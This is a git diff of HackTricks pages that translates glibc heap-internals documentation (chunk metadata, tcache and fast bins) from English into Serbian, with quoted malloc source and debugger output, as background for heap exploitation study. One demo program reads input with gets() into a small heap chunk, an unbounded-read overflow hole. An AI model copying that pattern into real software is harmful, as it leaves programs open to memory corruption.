Različita polja imaju različita značenja za alocirane i nealokirane delove. ```c // https://github.com/bminor/glibc/blob/master/malloc/malloc.c struct malloc_chunk { - INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk, if it is free. */ - INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including overhead. */ - struct malloc_chunk* fd; /* double links -- used only if this chunk is free. */ - struct malloc_chunk* bk; - /* Only used for large blocks: pointer to next larger size. */ - struct malloc_chunk* fd_nextsize; /* double links -- used only if this chunk is free. */ - struct malloc_chunk* bk_nextsize; +INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk, if it is free. */ +INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including overhead. */ +struct malloc_chunk* fd; /* double links -- used only if this chunk is free. */ +struct malloc_chunk* bk; +/* Only used for large blocks: pointer to next larger size. */ +struct malloc_chunk* fd_nextsize; /* double links -- used only if this chunk is free. */ +struct malloc_chunk* bk_nextsize; }; typedef struct malloc_chunk* mchunkptr; ``` - -As commented previously, these chunks also have some metadata, very good represented in this image: +Kao što je prethodno komentarisano, ovi delovi takođe imaju neke metapodatke, veoma dobro predstavljene na ovoj slici:

https://azeria-labs.com/wp-content/uploads/2019/03/chunk-allocated-CS.png

-The metadata is usually 0x08B indicating the current chunk size using the last 3 bits to indicate: +Metapodaci obično imaju vrednost 0x08B koja označava trenutnu veličinu dela koristeći poslednja 3 bita za označavanje: -- `A`: If 1 it comes from a subheap, if 0 it's in the main arena -- `M`: If 1, this chunk is part of a space allocated with mmap and not part of a heap -- `P`: If 1, the previous chunk is in use +- `A`: Ako je 1, dolazi iz podheap-a, ako je 0, u glavnoj areni je +- `M`: Ako je 1, ovaj deo je deo prostora dodeljenog sa mmap i nije deo heap-a +- `P`: Ako je 1, prethodni deo je u upotrebi -Then, the space for the user data, and finally 0x08B to indicate the previous chunk size when the chunk is available (or to store user data when it's allocated). +Zatim, prostor za korisničke podatke, i konačno 0x08B da označi veličinu prethodnog dela kada je deo dostupan (ili da čuva korisničke podatke kada je dodeljen). -Moreover, when available, the user data is used to contain also some data: +Štaviše, kada je dostupan, korisnički podaci se koriste i za sadržaj nekih podataka: -- **`fd`**: Pointer to the next chunk -- **`bk`**: Pointer to the previous chunk -- **`fd_nextsize`**: Pointer to the first chunk in the list is smaller than itself -- **`bk_nextsize`:** Pointer to the first chunk the list that is larger than itself +- **`fd`**: Pokazivač na sledeći deo +- **`bk`**: Pokazivač na prethodni deo +- **`fd_nextsize`**: Pokazivač na prvi deo u listi koji je manji od njega samog +- **`bk_nextsize`:** Pokazivač na prvi deo u listi koji je veći od njega samog

https://azeria-labs.com/wp-content/uploads/2019/03/chunk-allocated-CS.png

> [!NOTE] -> Note how liking the list this way prevents the need to having an array where every single chunk is being registered. +> Obratite pažnju kako povezivanje liste na ovaj način sprečava potrebu za imanjem niza u kojem se registruje svaki pojedinačni deo. -### Chunk Pointers - -When malloc is used a pointer to the content that can be written is returned (just after the headers), however, when managing chunks, it's needed a pointer to the begining of the headers (metadata).\ -For these conversions these functions are used: +### Pokazivači na delove +Kada se koristi malloc, vraća se pokazivač na sadržaj koji može biti napisan (odmah nakon zaglavlja), međutim, kada se upravlja delovima, potreban je pokazivač na početak zaglavlja (metapodaci).\ +Za ove konverzije koriste se ove funkcije: ```c // https://github.com/bminor/glibc/blob/master/malloc/malloc.c @@ -207,13 +200,11 @@ For these conversions these functions are used: /* The smallest size we can malloc is an aligned minimal chunk */ #define MINSIZE \ - (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)) +(unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)) ``` +### Poravnanje i minimalna veličina -### Alignment & min size - -The pointer to the chunk and `0x0f` must be 0. - +Pokazivač na deo i `0x0f` moraju biti 0. ```c // From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/sysdeps/generic/malloc-size.h#L61 #define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1) 
@@ -227,56 +218,54 @@ The pointer to the chunk and `0x0f` must be 0. #define aligned_OK(m) (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0) #define misaligned_chunk(p) \ - ((uintptr_t)(MALLOC_ALIGNMENT == CHUNK_HDR_SZ ? (p) : chunk2mem (p)) \ - & MALLOC_ALIGN_MASK) +((uintptr_t)(MALLOC_ALIGNMENT == CHUNK_HDR_SZ ? (p) : chunk2mem (p)) \ +& MALLOC_ALIGN_MASK) /* pad request bytes into a usable size -- internal version */ /* Note: This must be a macro that evaluates to a compile time constant - if passed a literal constant. */ +if passed a literal constant. */ #define request2size(req) \ - (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE) ? \ - MINSIZE : \ - ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK) +(((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE) ? \ +MINSIZE : \ +((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK) /* Check if REQ overflows when padded and aligned and if the resulting - value is less than PTRDIFF_T. Returns the requested size or - MINSIZE in case the value is less than MINSIZE, or 0 if any of the - previous checks fail. */ +value is less than PTRDIFF_T. Returns the requested size or +MINSIZE in case the value is less than MINSIZE, or 0 if any of the +previous checks fail. */ static inline size_t checked_request2size (size_t req) __nonnull (1) { - if (__glibc_unlikely (req > PTRDIFF_MAX)) - return 0; +if (__glibc_unlikely (req > PTRDIFF_MAX)) +return 0; - /* When using tagged memory, we cannot share the end of the user - block with the header for the next chunk, so ensure that we - allocate blocks that are rounded up to the granule size. Take - care not to overflow from close to MAX_SIZE_T to a small - number. Ideally, this would be part of request2size(), but that - must be a macro that produces a compile time constant if passed - a constant literal. */ - if (__glibc_unlikely (mtag_enabled)) - { - /* Ensure this is not evaluated if !mtag_enabled, see gcc PR 99551. 
*/ - asm (""); +/* When using tagged memory, we cannot share the end of the user +block with the header for the next chunk, so ensure that we +allocate blocks that are rounded up to the granule size. Take +care not to overflow from close to MAX_SIZE_T to a small +number. Ideally, this would be part of request2size(), but that +must be a macro that produces a compile time constant if passed +a constant literal. */ +if (__glibc_unlikely (mtag_enabled)) +{ +/* Ensure this is not evaluated if !mtag_enabled, see gcc PR 99551. */ +asm (""); - req = (req + (__MTAG_GRANULE_SIZE - 1)) & - ~(size_t)(__MTAG_GRANULE_SIZE - 1); - } +req = (req + (__MTAG_GRANULE_SIZE - 1)) & +~(size_t)(__MTAG_GRANULE_SIZE - 1); +} - return request2size (req); +return request2size (req); } ``` +Napomena da se za izračunavanje ukupnog potrebnog prostora `SIZE_SZ` dodaje samo 1 put jer se polje `prev_size` može koristiti za skladištenje podataka, stoga je potreban samo inicijalni zaglavlje. -Note that for calculating the total space needed it's only added `SIZE_SZ` 1 time because the `prev_size` field can be used to store data, therefore only the initial header is needed. +### Preuzmi Chunk podatke i izmeni metapodatke -### Get Chunk data and alter metadata - -These functions work by receiving a pointer to a chunk and are useful to check/set metadata: - -- Check chunk flags +Ove funkcije rade tako što primaju pokazivač na chunk i korisne su za proveru/postavljanje metapodataka: +- Proveri chunk zastavice ```c // From https://github.com/bminor/glibc/blob/master/malloc/malloc.c 
@@ -296,8 +285,8 @@ These functions work by receiving a pointer to a chunk and are useful to check/s /* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained - from a non-main arena. This is only set immediately before handing - the chunk to the user, if necessary. */ +from a non-main arena. This is only set immediately before handing +the chunk to the user, if necessary. */ #define NON_MAIN_ARENA 0x4 /* Check for chunk from main arena. */ @@ -306,18 +295,16 @@ These functions work by receiving a pointer to a chunk and are useful to check/s /* Mark a chunk as not being on the main arena. */ #define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA) ``` - -- Sizes and pointers to other chunks - +- Veličine i pokazivači na druge delove ```c /* - Bits to mask off when extracting size +Bits to mask off when extracting size - Note: IS_MMAPPED is intentionally not masked off from size field in - macros for which mmapped chunks should never be seen. This should - cause helpful core dumps to occur if it is tried by accident by - people extending or adapting this malloc. - */ +Note: IS_MMAPPED is intentionally not masked off from size field in +macros for which mmapped chunks should never be seen. This should +cause helpful core dumps to occur if it is tried by accident by +people extending or adapting this malloc. +*/ #define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) /* Get size, ignoring use bits */ 
@@ -341,35 +328,31 @@ These functions work by receiving a pointer to a chunk and are useful to check/s /* Treat space at ptr + offset as a chunk */ #define chunk_at_offset(p, s) ((mchunkptr) (((char *) (p)) + (s))) ``` - - Insue bit - ```c /* extract p's inuse bit */ #define inuse(p) \ - ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE) +((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE) /* set/clear chunk as being inuse without otherwise disturbing */ #define set_inuse(p) \ - ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE +((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE #define clear_inuse(p) \ - ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE) +((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE) /* check/set/clear inuse bits in known places */ #define inuse_bit_at_offset(p, s) \ - (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE) +(((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE) #define set_inuse_bit_at_offset(p, s) \ - (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE) +(((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE) #define clear_inuse_bit_at_offset(p, s) \ - (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE)) +(((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE)) ``` - -- Set head and footer (when chunk nos in use - +- Postavite zaglavlje i podnožje (kada se koriste brojevi delova) ```c /* Set size at head, without disturbing its use bit */ #define set_head_size(p, s) ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s))) 
@@ -380,44 +363,40 @@ These functions work by receiving a pointer to a chunk and are useful to check/s /* Set size at footer (only when chunk is not in use) */ #define set_foot(p, s) (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s)) ``` - -- Get the size of the real usable data inside the chunk - +- Dobijte veličinu stvarnih upotrebljivih podataka unutar dela ```c #pragma GCC poison mchunk_size #pragma GCC poison mchunk_prev_size /* This is the size of the real usable data in the chunk. Not valid for - dumped heap chunks. */ +dumped heap chunks. */ #define memsize(p) \ - (__MTAG_GRANULE_SIZE > SIZE_SZ && __glibc_unlikely (mtag_enabled) ? \ - chunksize (p) - CHUNK_HDR_SZ : \ - chunksize (p) - CHUNK_HDR_SZ + (chunk_is_mmapped (p) ? 0 : SIZE_SZ)) +(__MTAG_GRANULE_SIZE > SIZE_SZ && __glibc_unlikely (mtag_enabled) ? \ +chunksize (p) - CHUNK_HDR_SZ : \ +chunksize (p) - CHUNK_HDR_SZ + (chunk_is_mmapped (p) ? 0 : SIZE_SZ)) /* If memory tagging is enabled the layout changes to accommodate the granule - size, this is wasteful for small allocations so not done by default. - Both the chunk header and user data has to be granule aligned. */ +size, this is wasteful for small allocations so not done by default. +Both the chunk header and user data has to be granule aligned. 
*/ _Static_assert (__MTAG_GRANULE_SIZE <= CHUNK_HDR_SZ, - "memory tagging is not supported with large granule."); +"memory tagging is not supported with large granule."); static __always_inline void * tag_new_usable (void *ptr) { - if (__glibc_unlikely (mtag_enabled) && ptr) - { - mchunkptr cp = mem2chunk(ptr); - ptr = __libc_mtag_tag_region (__libc_mtag_new_tag (ptr), memsize (cp)); - } - return ptr; +if (__glibc_unlikely (mtag_enabled) && ptr) +{ +mchunkptr cp = mem2chunk(ptr); +ptr = __libc_mtag_tag_region (__libc_mtag_new_tag (ptr), memsize (cp)); +} +return ptr; } ``` +## Primeri -## Examples - -### Quick Heap Example - -Quick heap example from [https://guyinatuxedo.github.io/25-heap/index.html](https://guyinatuxedo.github.io/25-heap/index.html) but in arm64: +### Brzi Heap Primer +Brzi heap primer sa [https://guyinatuxedo.github.io/25-heap/index.html](https://guyinatuxedo.github.io/25-heap/index.html) ali u arm64: ```c #include #include @@ -425,32 +404,28 @@ Quick heap example from [https://guyinatuxedo.github.io/25-heap/index.html](http void main(void) { - char *ptr; - ptr = malloc(0x10); - strcpy(ptr, "panda"); +char *ptr; +ptr = malloc(0x10); +strcpy(ptr, "panda"); } ``` - -Set a breakpoint at the end of the main function and lets find out where the information was stored: +Postavite tačku prekida na kraju glavne funkcije i hajde da saznamo gde je informacija sačuvana:
-It's possible to see that the string panda was stored at `0xaaaaaaac12a0` (which was the address given as response by malloc inside `x0`). Checking 0x10 bytes before it's possible to see that the `0x0` represents that the **previous chunk is not used** (length 0) and that the length of this chunk is `0x21`. - -The extra spaces reserved (0x21-0x10=0x11) comes from the **added headers** (0x10) and 0x1 doesn't mean that it was reserved 0x21B but the last 3 bits of the length of the current headed have the some special meanings. As the length is always 16-byte aligned (in 64bits machines), these bits are actually never going to be used by the length number. +Moguće je videti da je string panda sačuvan na `0xaaaaaaac12a0` (što je adresa koju je vratio malloc unutar `x0`). Proveravajući 0x10 bajtova pre, moguće je videti da `0x0` predstavlja da **prethodni deo nije korišćen** (dužina 0) i da je dužina ovog dela `0x21`. +Dodatni prostori rezervisani (0x21-0x10=0x11) dolaze od **dodatih zaglavlja** (0x10) i 0x1 ne znači da je rezervisano 0x21B, već poslednja 3 bita dužine trenutnog zaglavlja imaju neka posebna značenja. Pošto je dužina uvek poravnata na 16 bajtova (na 64-bitnim mašinama), ovi bitovi se zapravo nikada neće koristiti za broj dužine. ``` 0x1: Previous in Use - Specifies that the chunk before it in memory is in use 0x2: Is MMAPPED - Specifies that the chunk was obtained with mmap() 0x4: Non Main Arena - Specifies that the chunk was obtained from outside of the main arena ``` - -### Multithreading Example +### Primer višestrukog niti
-Multithread - +Višestruka nit ```c #include #include @@ -460,56 +435,55 @@ The extra spaces reserved (0x21-0x10=0x11) comes from the **added headers** (0x1 void* threadFuncMalloc(void* arg) { - printf("Hello from thread 1\n"); - char* addr = (char*) malloc(1000); - printf("After malloc and before free in thread 1\n"); - free(addr); - printf("After free in thread 1\n"); +printf("Hello from thread 1\n"); +char* addr = (char*) malloc(1000); +printf("After malloc and before free in thread 1\n"); +free(addr); +printf("After free in thread 1\n"); } void* threadFuncNoMalloc(void* arg) { - printf("Hello from thread 2\n"); +printf("Hello from thread 2\n"); } int main() { - pthread_t t1; - void* s; - int ret; - char* addr; +pthread_t t1; +void* s; +int ret; +char* addr; - printf("Before creating thread 1\n"); - getchar(); - ret = pthread_create(&t1, NULL, threadFuncMalloc, NULL); - getchar(); +printf("Before creating thread 1\n"); +getchar(); +ret = pthread_create(&t1, NULL, threadFuncMalloc, NULL); +getchar(); - printf("Before creating thread 2\n"); - ret = pthread_create(&t1, NULL, threadFuncNoMalloc, NULL); +printf("Before creating thread 2\n"); +ret = pthread_create(&t1, NULL, threadFuncNoMalloc, NULL); - printf("Before exit\n"); - getchar(); +printf("Before exit\n"); +getchar(); - return 0; +return 0; } ``` -
-Debugging the previous example it's possible to see how at the beginning there is only 1 arena: +Debugging prethodnog primera moguće je videti kako na početku postoji samo 1 arena:
-Then, after calling the first thread, the one that calls malloc, a new arena is created: +Zatim, nakon pozivanja prvog threada, onog koji poziva malloc, kreira se nova arena:
-and inside of it some chunks can be found: +i unutar nje mogu se naći neki chunks:
## Bins & Memory Allocations/Frees -Check what are the bins and how are they organized and how memory is allocated and freed in: +Proverite koji su bins i kako su organizovani i kako se memorija alocira i oslobađa u: {{#ref}} bins-and-memory-allocations.md @@ -517,7 +491,7 @@ bins-and-memory-allocations.md ## Heap Functions Security Checks -Functions involved in heap will perform certain check before performing its actions to try to make sure the heap wasn't corrupted: +Funkcije uključene u heap će izvršiti određene provere pre nego što izvrše svoje akcije kako bi pokušale da osiguraju da heap nije oštećen: {{#ref}} heap-memory-functions/heap-functions-security-checks.md diff --git a/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md b/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md index eb184fc93..c02abb92a 100644 --- a/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md +++ b/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md 
@@ -2,60 +2,55 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne Informacije -In order to improve the efficiency on how chunks are stored every chunk is not just in one linked list, but there are several types. These are the bins and there are 5 type of bins: [62](https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=blob;f=malloc/malloc.c;h=6e766d11bc85b6480fa5c9f2a76559f8acf9deb5;hb=HEAD#l1407) small bins, 63 large bins, 1 unsorted bin, 10 fast bins and 64 tcache bins per thread. +Da bi se poboljšala efikasnost načina na koji se delovi čuvaju, svaki deo nije samo u jednoj povezanoj listi, već postoji nekoliko tipova. To su binovi i postoji 5 tipova binova: [62](https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=blob;f=malloc/malloc.c;h=6e766d11bc85b6480fa5c9f2a76559f8acf9deb5;hb=HEAD#l1407) mali binovi, 63 veliki binovi, 1 nesortirani bin, 10 brzih binova i 64 tcache binova po niti. -The initial address to each unsorted, small and large bins is inside the same array. The index 0 is unused, 1 is the unsorted bin, bins 2-64 are small bins and bins 65-127 are large bins. +Početna adresa za svaki nesortirani, mali i veliki bin je unutar istog niza. Indeks 0 se ne koristi, 1 je nesortirani bin, binovi 2-64 su mali binovi, a binovi 65-127 su veliki binovi. ### Tcache (Per-Thread Cache) Bins -Even though threads try to have their own heap (see [Arenas](bins-and-memory-allocations.md#arenas) and [Subheaps](bins-and-memory-allocations.md#subheaps)), there is the possibility that a process with a lot of threads (like a web server) **will end sharing the heap with another threads**. In this case, the main solution is the use of **lockers**, which might **slow down significantly the threads**. 
+Iako niti pokušavaju da imaju svoj vlastiti heap (vidi [Arenas](bins-and-memory-allocations.md#arenas) i [Subheaps](bins-and-memory-allocations.md#subheaps)), postoji mogućnost da proces sa puno niti (kao što je web server) **će završiti deljenjem heapa sa drugim nitima**. U ovom slučaju, glavno rešenje je korišćenje **zaključavanja**, što može **značajno usporiti niti**. -Therefore, a tcache is similar to a fast bin per thread in the way that it's a **single linked list** that doesn't merge chunks. Each thread has **64 singly-linked tcache bins**. Each bin can have a maximum of [7 same-size chunks](https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l323) ranging from [24 to 1032B on 64-bit systems and 12 to 516B on 32-bit systems](https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l315). +Stoga, tcache je sličan brzom binu po niti na način da je to **jedna povezana lista** koja ne spaja delove. Svaka nit ima **64 jednostruko povezane tcache binove**. Svaki bin može imati maksimalno [7 delova iste veličine](https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l323) u rasponu od [24 do 1032B na 64-bitnim sistemima i 12 do 516B na 32-bitnim sistemima](https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l315). -**When a thread frees** a chunk, **if it isn't too big** to be allocated in the tcache and the respective tcache bin **isn't full** (already 7 chunks), **it'll be allocated in there**. If it cannot go to the tcache, it'll need to wait for the heap lock to be able to perform the free operation globally. 
+**Kada nit oslobodi** deo, **ako nije prevelik** da bi se alocirao u tcache i odgovarajući tcache bin **nije pun** (već 7 delova), **biće alociran tamo**. Ako ne može da ide u tcache, moraće da čeka na zaključavanje heapa da bi mogla da izvrši operaciju oslobađanja globalno. -When a **chunk is allocated**, if there is a free chunk of the needed size in the **Tcache it'll use it**, if not, it'll need to wait for the heap lock to be able to find one in the global bins or create a new one.\ -There's also an optimization, in this case, while having the heap lock, the thread **will fill his Tcache with heap chunks (7) of the requested size**, so in case it needs more, it'll find them in Tcache. +Kada je **deo alociran**, ako postoji slobodan deo potrebne veličine u **Tcache, koristiće ga**, ako ne, moraće da čeka na zaključavanje heapa da bi mogla da pronađe jedan u globalnim binovima ili da kreira novi.\ +Takođe postoji optimizacija, u ovom slučaju, dok ima zaključavanje heapa, nit **će napuniti svoj Tcache delovima heapa (7) tražene veličine**, tako da u slučaju da mu zatreba više, naći će ih u Tcache.
-Add a tcache chunk example - +Dodaj primer tcache dela ```c #include #include int main(void) { - char *chunk; - chunk = malloc(24); - printf("Address of the chunk: %p\n", (void *)chunk); - gets(chunk); - free(chunk); - return 0; +char *chunk; +chunk = malloc(24); +printf("Address of the chunk: %p\n", (void *)chunk); +gets(chunk); +free(chunk); +return 0; } ``` - -Compile it and debug it with a breakpoint in the ret opcode from main function. then with gef you can see the tcache bin in use: - +Kompajlirajte ga i debagujte sa tačkom prekida u ret opkodu iz main funkcije. Tada sa gef možete videti tcache bin u upotrebi: ```bash gef➤ heap bins ──────────────────────────────────────────────────────────────────────────────── Tcachebins for thread 1 ──────────────────────────────────────────────────────────────────────────────── Tcachebins[idx=0, size=0x20, count=1] ← Chunk(addr=0xaaaaaaac12a0, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) ``` -
-#### Tcache Structs & Functions +#### Tcache strukture i funkcije -In the following code it's possible to see the **max bins** and **chunks per index**, the **`tcache_entry`** struct created to avoid double frees and **`tcache_perthread_struct`**, a struct that each thread uses to store the addresses to each index of the bin. +U sledećem kodu moguće je videti **max bins** i **chunks per index**, **`tcache_entry`** strukturu kreiranu da izbegne duple oslobađanja i **`tcache_perthread_struct`**, strukturu koju svaka nit koristi za čuvanje adresa za svaki indeks bin-a.
-tcache_entry and tcache_perthread_struct - +tcache_entry i tcache_perthread_struct ```c // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c 
@@ -72,135 +67,131 @@ In the following code it's possible to see the **max bins** and **chunks per ind # define usize2tidx(x) csize2tidx (request2size (x)) /* With rounding and alignment, the bins are... - idx 0 bytes 0..24 (64-bit) or 0..12 (32-bit) - idx 1 bytes 25..40 or 13..20 - idx 2 bytes 41..56 or 21..28 - etc. */ +idx 0 bytes 0..24 (64-bit) or 0..12 (32-bit) +idx 1 bytes 25..40 or 13..20 +idx 2 bytes 41..56 or 21..28 +etc. */ /* This is another arbitrary limit, which tunables can change. Each - tcache bin will hold at most this number of chunks. */ +tcache bin will hold at most this number of chunks. */ # define TCACHE_FILL_COUNT 7 /* Maximum chunks in tcache bins for tunables. This value must fit the range - of tcache->counts[] entries, else they may overflow. */ +of tcache->counts[] entries, else they may overflow. */ # define MAX_TCACHE_COUNT UINT16_MAX [...] typedef struct tcache_entry { - struct tcache_entry *next; - /* This field exists to detect double frees. */ - uintptr_t key; +struct tcache_entry *next; +/* This field exists to detect double frees. */ +uintptr_t key; } tcache_entry; /* There is one of these for each thread, which contains the - per-thread cache (hence "tcache_perthread_struct"). Keeping - overall size low is mildly important. Note that COUNTS and ENTRIES - are redundant (we could have just counted the linked list each - time), this is for performance reasons. */ +per-thread cache (hence "tcache_perthread_struct"). Keeping +overall size low is mildly important. Note that COUNTS and ENTRIES +are redundant (we could have just counted the linked list each +time), this is for performance reasons. */ typedef struct tcache_perthread_struct { - uint16_t counts[TCACHE_MAX_BINS]; - tcache_entry *entries[TCACHE_MAX_BINS]; +uint16_t counts[TCACHE_MAX_BINS]; +tcache_entry *entries[TCACHE_MAX_BINS]; } tcache_perthread_struct; ``` -
-The function `__tcache_init` is the function that creates and allocates the space for the `tcache_perthread_struct` obj +Funkcija `__tcache_init` je funkcija koja kreira i alocira prostor za objekat `tcache_perthread_struct`
-tcache_init code - +tcache_init kod ```c // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L3241C1-L3274C2 static void tcache_init(void) { - mstate ar_ptr; - void *victim = 0; - const size_t bytes = sizeof (tcache_perthread_struct); +mstate ar_ptr; +void *victim = 0; +const size_t bytes = sizeof (tcache_perthread_struct); - if (tcache_shutting_down) - return; +if (tcache_shutting_down) +return; - arena_get (ar_ptr, bytes); - victim = _int_malloc (ar_ptr, bytes); - if (!victim && ar_ptr != NULL) - { - ar_ptr = arena_get_retry (ar_ptr, bytes); - victim = _int_malloc (ar_ptr, bytes); - } +arena_get (ar_ptr, bytes); +victim = _int_malloc (ar_ptr, bytes); +if (!victim && ar_ptr != NULL) +{ +ar_ptr = arena_get_retry (ar_ptr, bytes); +victim = _int_malloc (ar_ptr, bytes); +} - if (ar_ptr != NULL) - __libc_lock_unlock (ar_ptr->mutex); +if (ar_ptr != NULL) +__libc_lock_unlock (ar_ptr->mutex); - /* In a low memory situation, we may not be able to allocate memory - - in which case, we just keep trying later. However, we - typically do this very early, so either there is sufficient - memory, or there isn't enough memory to do non-trivial - allocations anyway. */ - if (victim) - { - tcache = (tcache_perthread_struct *) victim; - memset (tcache, 0, sizeof (tcache_perthread_struct)); - } +/* In a low memory situation, we may not be able to allocate memory +- in which case, we just keep trying later. However, we +typically do this very early, so either there is sufficient +memory, or there isn't enough memory to do non-trivial +allocations anyway. */ +if (victim) +{ +tcache = (tcache_perthread_struct *) victim; +memset (tcache, 0, sizeof (tcache_perthread_struct)); +} } ``` -
-#### Tcache Indexes +#### Tcache indeksi -The tcache have several bins depending on the size an the initial pointers to the **first chunk of each index and the amount of chunks per index are located inside a chunk**. This means that locating the chunk with this information (usually the first), it's possible to find all the tcache initial points and the amount of Tcache chunks. +Tcache ima nekoliko binova u zavisnosti od veličine, a inicijalni pokazivači na **prvi deo svakog indeksa i količina delova po indeksu nalaze se unutar dela**. To znači da lociranje dela sa ovom informacijom (obično prvim) omogućava pronalaženje svih tcache inicijalnih tačaka i količine Tcache delova. -### Fast bins +### Brzi binovi -Fast bins are designed to **speed up memory allocation for small chunks** by keeping recently freed chunks in a quick-access structure. These bins use a Last-In, First-Out (LIFO) approach, which means that the **most recently freed chunk is the first** to be reused when there's a new allocation request. This behaviour is advantageous for speed, as it's faster to insert and remove from the top of a stack (LIFO) compared to a queue (FIFO). +Brzi binovi su dizajnirani da **ubrza alokaciju memorije za male delove** čuvajući nedavno oslobođene delove u strukturi brzog pristupa. Ovi binovi koriste pristup Last-In, First-Out (LIFO), što znači da je **najnovije oslobođeni deo prvi** koji će se ponovo koristiti kada postoji nova zahtev za alokaciju. Ovo ponašanje je korisno za brzinu, jer je brže umetati i uklanjati sa vrha steka (LIFO) u poređenju sa redom (FIFO). -Additionally, **fast bins use singly linked lists**, not double linked, which further improves speed. Since chunks in fast bins aren't merged with neighbours, there's no need for a complex structure that allows removal from the middle. A singly linked list is simpler and quicker for these operations. 
+Pored toga, **brzi binovi koriste jednostruko povezane liste**, a ne dvostruko povezane, što dodatno poboljšava brzinu. Pošto se delovi u brzim binovima ne spajaju sa susedima, nema potrebe za složenom strukturom koja omogućava uklanjanje iz sredine. Jednostruko povezana lista je jednostavnija i brža za ove operacije. -Basically, what happens here is that the header (the pointer to the first chunk to check) is always pointing to the latest freed chunk of that size. So: +U suštini, ono što se ovde dešava je da je zaglavlje (pokazivač na prvi deo koji treba proveriti) uvek usmereno na najnovije oslobođeni deo te veličine. Dakle: -- When a new chunk is allocated of that size, the header is pointing to a free chunk to use. As this free chunk is pointing to the next one to use, this address is stored in the header so the next allocation knows where to get an available chunk -- When a chunk is freed, the free chunk will save the address to the current available chunk and the address to this newly freed chunk will be put in the header +- Kada se alocira novi deo te veličine, zaglavlje pokazuje na slobodan deo koji se može koristiti. Pošto ovaj slobodan deo pokazuje na sledeći koji se može koristiti, ova adresa se čuva u zaglavlju tako da sledeća alokacija zna gde da pronađe dostupni deo. +- Kada se deo oslobodi, slobodan deo će sačuvati adresu trenutnog dostupnog dela, a adresa ovog novog oslobođenog dela će biti stavljena u zaglavlje. -The maximum size of a linked list is `0x80` and they are organized so a chunk of size `0x20` will be in index `0`, a chunk of size `0x30` would be in index `1`... - -> [!CAUTION] -> Chunks in fast bins aren't set as available so they are keep as fast bin chunks for some time instead of being able to merge with other free chunks surrounding them. +Maksimalna veličina povezane liste je `0x80` i organizovane su tako da će deo veličine `0x20` biti u indeksu `0`, deo veličine `0x30` biće u indeksu `1`... 
+> [!OPREZ] +> Delovi u brzim binovima nisu postavljeni kao dostupni, tako da se čuvaju kao delovi brzih binova neko vreme umesto da se mogu spojiti sa drugim slobodnim delovima koji ih okružuju. ```c // From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/malloc/malloc.c#L1711 /* - Fastbins +Fastbins - An array of lists holding recently freed small chunks. Fastbins - are not doubly linked. It is faster to single-link them, and - since chunks are never removed from the middles of these lists, - double linking is not necessary. Also, unlike regular bins, they - are not even processed in FIFO order (they use faster LIFO) since - ordering doesn't much matter in the transient contexts in which - fastbins are normally used. +An array of lists holding recently freed small chunks. Fastbins +are not doubly linked. It is faster to single-link them, and +since chunks are never removed from the middles of these lists, +double linking is not necessary. Also, unlike regular bins, they +are not even processed in FIFO order (they use faster LIFO) since +ordering doesn't much matter in the transient contexts in which +fastbins are normally used. - 